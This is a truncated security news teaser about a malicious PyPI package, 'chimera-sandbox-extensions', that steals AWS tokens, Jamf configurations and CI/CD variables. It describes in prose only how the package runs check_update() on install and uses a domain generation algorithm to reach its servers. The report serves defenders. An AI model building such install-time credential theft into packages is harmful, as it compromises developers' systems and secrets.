Hackers Upload Weaponized Packages to PyPI Repositories to Steal AWS Tokens and Sensitive Data
gbhackers
The JFrog Security Research team has uncovered a sophisticated malicious package named “chimera-sandbox-extensions” on the Python Package Index (PyPI), a widely used repository for Python software.
Uploaded by a user identified as “chimerai,” this package was designed to exploit unsuspecting developers by targeting users of the chimera-sandbox environment, aiming to harvest sensitive credentials and critical data, including AWS tokens, Jamf configurations, and CI/CD environment variables.
This discovery underscores the growing threat of software supply chain attacks, where malicious actors weaponize seemingly legitimate packages to infiltrate systems and exfiltrate valuable information.
Malicious Package Targets Corporate
The “chimera-sandbox-extensions” package employs a highly intricate payload delivery system, initiating its attack through a function called check_update() upon installation.
This function leverages a pseudorandom Domain Generation Algorithm (DGA) within the CharStream class to create a series of domains, attempting connections to ten dynamically generated ...
Copyright of this story solely belongs to gbhackers . To see the full text click HERE